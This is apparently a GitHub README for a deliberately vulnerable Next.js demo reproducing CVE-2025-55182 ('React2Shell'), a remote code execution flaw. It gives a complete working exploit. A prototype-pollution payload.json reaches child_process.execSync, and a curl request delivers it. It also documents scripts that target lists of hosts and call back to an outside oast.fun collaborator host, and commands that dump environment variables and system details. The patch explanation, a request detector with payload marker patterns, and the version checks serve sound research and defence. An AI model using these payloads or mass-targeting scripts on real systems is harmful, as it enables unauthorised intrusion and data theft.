tauh33dkhan/react-shell

CVE-2025-55182 (React2Shell) Demo Application

This is a demo application to reproduce and debug the CVE-2025-55182 vulnerability, also known as "React2Shell". This vulnerability allows remote code execution in React Server Components and Next.js applications.

⚠️ WARNING

This application is intentionally vulnerable and should NEVER be exposed to the internet or used in production environments. It is for educational and security research purposes only.

Vulnerability Details

  • CVE ID: CVE-2025-55182
  • Type: Remote Code Execution (RCE)
  • CVSS Score: 10.0 (Critical)
  • Affected Versions:
    • React Server Components: 19.0, 19.1.0, 19.1.1, 19.2.0
    • Next.js: 15.x, 16.x (up to 16.0.6), 14.3.0-canary.77+

Node.js Version Requirements

This project requires Node.js version >= 20.9.0 (for Next.js compatibility). The project includes a .nvmrc file for easy version management.

Switching Node Versions

If you have nvm (Node Version Manager) installed, you can switch between versions easily:

Use the required version (20.9.0):

nvm use 20.9.0
# or simply:
nvm use

Switch back to the old version (20.6.0):

nvm use 20.6.0

List all installed versions:

nvm ls

Current versions available:

  • v20.6.0 (old version - kept for compatibility)
  • v20.9.0 (required for Next.js - currently active)

Setup Instructions

  1. Ensure you're using the correct Node version:

    nvm use  # Uses .nvmrc file (20.9.0)
    node --version  # Should show v20.9.0 or higher
  2. Install dependencies:

    npm install
  3. Build the application:

    npm run build
  4. Start the server:

    npm run start

    The application will be available at http://localhost:3000

Reproducing the Vulnerability

Method 1: Using the Bash Script

The script now supports multiple targets (list file or single URL) and a Burp Collaborator callback.

  1. Make the exploit script executable:

    chmod +x exploit.sh
  2. Run against a single target and send a callback to a Burp Collaborator URL (default command: curl -s <collaborator>). Targets without a scheme default to https://:

    ./exploit.sh http://localhost:3000 https://abc123.oast.fun
  3. Run against a list of targets (one host per line, scheme optional; missing scheme defaults to https://):

    ./exploit.sh targets.txt https://abc123.oast.fun
  4. Use a custom command instead of the collaborator callback:

    ./exploit.sh http://localhost:3000 https://abc123.oast.fun "whoami > /tmp/test"
  5. Check if the command executed:

    cat /tmp/pwned

Method 2: Using the Python Script

  1. Install Python dependencies (if needed):

    pip install requests
  2. Run against a single target with Burp Collaborator callback (default command: curl -s <collaborator>). Targets without a scheme default to https://:

    python3 exploit.py http://localhost:3000 https://abc123.oast.fun
  3. Run against a list of targets (one host per line, scheme optional; missing scheme defaults to https://):

    python3 exploit.py targets.txt https://abc123.oast.fun
  4. Use a custom command:

    python3 exploit.py http://localhost:3000 https://abc123.oast.fun "whoami > /tmp/test"

Method 3: Manual Exploitation

  1. Create payload.json:

    {
        "then": "$1:__proto__:then",
        "status": "resolved_model",
        "reason": -1,
        "value": "{\"then\": \"$B0\"}",
        "_response": {
            "_prefix": "process.mainModule.require('child_process').execSync('id > /tmp/pwned');",
            "_formData": {
                "get": "$1:constructor:constructor"
            }
        }
    }
  2. Create payload2.txt:

    "$@0"
    
  3. Send the exploit request:

    curl -X POST http://localhost:3000 \
        -H "Next-Action: dontcare" \
        -F "0=<payload.json" \
        -F "1=<payload2.txt" \
        --max-time 2
  4. Verify command execution:

    cat /tmp/pwned
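From the defender's side, the request built in the steps above has a recognisable shape. The following is an added example (not part of the react-shell repository) that parses a raw HTTP request and reports which of the README's payload markers it contains; the sample request is constructed here, and the marker list is derived from payload.json and payload2.txt above, not from any published detection rule.

```javascript
// Added example (not part of the react-shell repo): a server-side check that
// flags a request shaped like the one built above. Input is a constructed raw
// HTTP/1.1 request string; the markers are taken from the README's payload.json
// and payload2.txt, not from any published detection rule.

// Strings that together characterise this exploit request.
const MARKERS = [
  /\$1:__proto__:/,               // chunk reference that walks the prototype chain
  /\$1:constructor:constructor/,  // chunk reference that walks the constructor chain
  /\$B\d+/,                       // blob-chunk reference used by the payload
  /"_prefix"\s*:/,                // attacker-supplied string that ends up as code
];

// Split a raw request into method, lower-cased headers and multipart part bodies.
function parseRequest(raw) {
  const sep = raw.indexOf("\r\n\r\n");
  if (sep < 0) return { method: "", headers: {}, parts: [] };
  const headLines = raw.slice(0, sep).split("\r\n");
  const headers = {};
  for (const line of headLines.slice(1)) {
    const i = line.indexOf(":");
    if (i > 0) headers[line.slice(0, i).toLowerCase()] = line.slice(i + 1).trim();
  }
  const body = raw.slice(sep + 4);
  const b = /boundary=([^;\s]+)/.exec(headers["content-type"] || "");
  const parts = b
    ? body.split(`--${b[1]}`).map((p) => p.split("\r\n\r\n").slice(1).join("")).filter(Boolean)
    : [body];
  return { method: headLines[0].split(" ")[0], headers, parts };
}

// Returns the markers matched. A Server Action POST (Next-Action header) with two
// or more matches is a strong signal; a single match is still worth logging.
function detectReact2Shell(raw) {
  const req = parseRequest(raw);
  if (req.method !== "POST" || !("next-action" in req.headers)) return [];
  const joined = req.parts.join("\n");
  return MARKERS.filter((re) => re.test(joined)).map((re) => re.source);
}

// Constructed request mirroring the curl command above (CRLF line endings).
const SAMPLE_REQUEST =
  "POST / HTTP/1.1\r\nHost: localhost:3000\r\nNext-Action: dontcare\r\n" +
  "Content-Type: multipart/form-data; boundary=XYZ\r\n\r\n" +
  '--XYZ\r\nContent-Disposition: form-data; name="0"\r\n\r\n' +
  '{"then":"$1:__proto__:then","status":"resolved_model","value":"{\\"then\\": \\"$B0\\"}"}\r\n' +
  '--XYZ\r\nContent-Disposition: form-data; name="1"\r\n\r\n"$@0"\r\n--XYZ--\r\n';
console.log(detectReact2Shell(SAMPLE_REQUEST)); // two markers matched
```

Literal markers are brittle against re-encoding, so treat this as a logging aid alongside the version upgrade under Remediation, not as a substitute for it.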

How It Works

The vulnerability is a server-side prototype pollution issue in React Server Components. The exploit works as follows:

  1. A POST request carrying specially crafted form data is sent to the server.
  2. The payload pollutes the prototype chain of JavaScript objects.
  3. This allows arbitrary code to be executed via child_process.execSync.

The patch adds a check using hasOwnProperty to prevent prototype pollution:

// Before (vulnerable):
return moduleExports[metadata[NAME]];

// After (patched):
if (hasOwnProperty.call(moduleExports, metadata[NAME])) {
  return moduleExports[metadata[NAME]];
}
return (undefined: any); // Flow type cast; compiles to a plain `return undefined`
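To see why the hasOwnProperty guard matters, here is an added illustration (not the project's or React's own code) of the lookup above in its vulnerable and patched forms, run against a constructed moduleExports object:

```javascript
// Added example (not the project's or React's own code): a minimal stand-in for
// the module-export lookup quoted above, in its vulnerable and patched forms.
// moduleExports is a constructed plain object, not a real RSC module table.
const hasOwnProperty = Object.prototype.hasOwnProperty;

// Before: a plain bracket lookup walks the prototype chain, so a name that is
// not an export of the module still resolves to an Object.prototype member.
function requireExportVulnerable(moduleExports, name) {
  return moduleExports[name];
}

// After: only the module's own exports resolve; inherited names yield undefined.
function requireExportPatched(moduleExports, name) {
  if (hasOwnProperty.call(moduleExports, name)) {
    return moduleExports[name];
  }
  return undefined;
}

// Constructed module table with a single real export.
const moduleExports = { default: function Page() { return "hello"; } };

// What each version returns for a given export name.
function compareLookups(name) {
  return {
    vulnerable: requireExportVulnerable(moduleExports, name),
    patched: requireExportPatched(moduleExports, name),
  };
}

// A request-supplied name of "constructor" yields the Object constructor from the
// vulnerable lookup, whose own constructor is Function; the guard cuts the chain off.
function reachesFunctionConstructor(lookup) {
  const first = lookup(moduleExports, "constructor");
  return first !== undefined && first.constructor === Function;
}

console.log(compareLookups("constructor")); // vulnerable: [Function: Object], patched: undefined
```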

Debugging

See EXPLOIT_EXPLANATION.md for a comprehensive explanation of how the exploit works and detailed debugging instructions.

Quick Debugging Setup

  1. Enable Node.js debugging:

    NODE_OPTIONS='--inspect' npm run start
  2. Attach a debugger:

    • Use Chrome DevTools: chrome://inspect
    • Or use VS Code's debugger
  3. Load the debugging helper script:

    • In Chrome DevTools console, paste the contents of debug-script.js
    • This will monitor prototype pollution and code execution
  4. Set breakpoints in:

    • node_modules/react-server-dom-parcel/server.js (or similar)
    • Look for the requireModule function
  5. Monitor the exploit:

    • Watch for prototype pollution
    • Observe how the payload affects object prototypes
    • Track the execution flow to child_process.execSync

Testing Different Commands

You can test various commands to understand the impact:

# System information
./exploit.sh http://localhost:3000 "uname -a > /tmp/test"

# Network information
./exploit.sh http://localhost:3000 "ifconfig > /tmp/test"

# File system access
./exploit.sh http://localhost:3000 "ls -la / > /tmp/test"

# Environment variables
./exploit.sh http://localhost:3000 "env > /tmp/test"

Remediation

To fix this vulnerability, upgrade to a patched version:

  • React Server Components: 19.0.1, 19.1.2, or 19.2.1
  • Next.js: 15.0.5+, 15.1.9+, 15.2.6+, 15.3.6+, 15.4.8+, 15.5.7+, or 16.0.7+

Check your dependencies:

npm audit
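npm audit depends on the advisory database being current; the following added example (not part of the react-shell repository) checks a package-lock.json "packages" map directly against the patched releases listed above. It assumes that "React Server Components" means the react-server-dom-* packages (the README itself points at react-server-dom-parcel) and that a pre-release of a fixed patch level, such as 16.0.7-canary.1, is not yet patched; the lock-file sample is constructed.

```javascript
// Added example (not part of the react-shell repo): classify installed versions
// against the patched releases listed under "Remediation" above. Assumptions:
// "React Server Components" = the react-server-dom-* packages, and a pre-release
// of the fixed patch level (e.g. 16.0.7-canary.1) counts as not yet patched.

// First patched patch-level per major.minor line, taken from the README.
const FIXED = {
  "react-server-dom": { "19.0": 1, "19.1": 2, "19.2": 1 },
  next: { "15.0": 5, "15.1": 9, "15.2": 6, "15.3": 6, "15.4": 8, "15.5": 7, "16.0": 7 },
};

// Parse "major.minor.patch[-prerelease]"; anything else yields null.
function parseVersion(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.-]+))?$/.exec(String(v).trim());
  return m ? { major: +m[1], minor: +m[2], patch: +m[3], prerelease: m[4] || null } : null;
}

// true = patched, false = vulnerable, null = not covered by the table above
// (other packages, React 18, Next.js 14 canaries, unparsable versions).
function isPatched(name, version) {
  const key = name === "next" ? "next" : name.startsWith("react-server-dom-") ? "react-server-dom" : null;
  const p = parseVersion(version);
  if (!key || !p) return null;
  const fixedPatch = FIXED[key][`${p.major}.${p.minor}`];
  if (fixedPatch === undefined) return null;
  if (p.patch !== fixedPatch) return p.patch > fixedPatch;
  return p.prerelease === null; // 16.0.7 is patched, 16.0.7-canary.1 is assumed not
}

// Walk the "packages" map of a package-lock.json object (nested copies included)
// and return every vulnerable package@version found.
function findVulnerable(lockPackages) {
  const out = [];
  for (const [path, info] of Object.entries(lockPackages)) {
    const name = path.split("node_modules/").pop();
    if (isPatched(name, info.version) === false) out.push(`${name}@${info.version}`);
  }
  return out;
}

// Constructed sample resembling the "packages" section of a package-lock.json.
const SAMPLE_LOCK = {
  "": { name: "demo-app" },
  "node_modules/next": { version: "16.0.6" },
  "node_modules/react-server-dom-webpack": { version: "19.2.1" },
  "node_modules/some-lib/node_modules/react-server-dom-parcel": { version: "19.1.1" },
};
console.log(findVulnerable(SAMPLE_LOCK)); // ["next@16.0.6", "react-server-dom-parcel@19.1.1"]
```

Nested copies under another package's node_modules are easy to miss in a quick `npm ls`, which is why the scan walks every lock-file path rather than only the top level.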

License

This demo application is provided for educational purposes only. Use responsibly and only in controlled environments.
